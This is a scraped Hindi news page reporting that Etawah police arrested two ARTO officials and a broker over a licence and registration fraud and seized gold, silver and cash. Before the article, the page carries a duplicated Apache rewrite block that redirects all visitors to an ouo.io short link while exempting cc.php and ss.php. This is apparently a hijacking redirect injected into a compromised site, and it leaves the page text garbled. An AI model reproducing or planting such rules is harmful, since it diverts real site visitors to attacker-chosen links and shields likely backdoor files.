
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 425
Nextइटावा। इटावा पुलिस ने एआरटीओ आॅफिस में बहुत बड़े फर्जीवाड़े का भंडाफोड़ किया है। कल देर रात तक चली कार्रवाई में पुलिस ने दो एआरटीओ हिमांशु जैन और मोहम्मद अजीम के साथ दलाल प्रदीप गुप्ता को गिरफ्तार किया हैं। पुलिस ने इस दौरान बड़ी मात्रा में सोना-चांदी और करीब 29 लाख कैश बरामद किया है।
पुलिस के मुताबिक छापेमारी के दौरान बिना एआरटीओ की मौजूदगी में उनके सरकारी पासवर्ड से बाहरी लोग काम करते मिले। इनसे पूछताछ के बाद टीम ने आगरा और फिरोजाबाद में छापेमारी की। कार्रवाई में दो किलो सोना, 10 किलो चांदी और 29 लाख की नगदी बरामद की गई। इटावा में ही एक घर में भी छापे के दौरान हजारों विभागीय रजिस्ट्रेशन, परमिट, लाइसेंस के प्रपत्र के अलावा सैकड़ों मोहरें और कारतूस भी बरामद किए हैं। बताया जा रहा है कि पुलिस की कार्रवाई में लिए गए लोगों से पूछताछ के बाद विभाग के कुछ अधिकारी कर्मचारियों की मिलीभगत भी उजागर हुई है। इनके बारे में पुलिस सुबूत इकट्ठा कर रही है। एसएसपी वैभव कृष्ण ने बताया कि गैंग के सरगना प्रदीप गुप्ता समेत दो एआरटीओ को गिरफ्तार किया गया है। पुलिस की टीम कार्रवाई कर रही है।